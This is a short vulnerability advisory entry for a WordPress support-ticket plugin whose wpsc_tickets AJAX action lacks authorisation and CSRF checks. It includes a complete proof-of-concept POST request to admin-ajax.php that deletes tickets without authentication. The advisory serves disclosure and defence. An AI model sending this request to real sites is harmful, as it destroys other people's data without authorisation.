The plugin does not have authorisation and CRSF checks in its wpsc_tickets AJAX action, which could allow unauthenticated users to call it and delete arbitrary tickets via the set_delete_permanently_bulk_ticket setting_action. Other actions may be affected as well.
POST /wp-admin/admin-ajax.php HTTP/1.1 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 81 Connection: close action=wpsc_tickets&setting_action=set_delete_permanently_bulk_ticket&ticket_id=3
YouTube Video
Brandon Roldan
Brandon Roldan
Yes
2022-01-05 (about 1 years ago)
2022-01-05 (about 1 years ago)
2022-04-08 (about 1 years ago)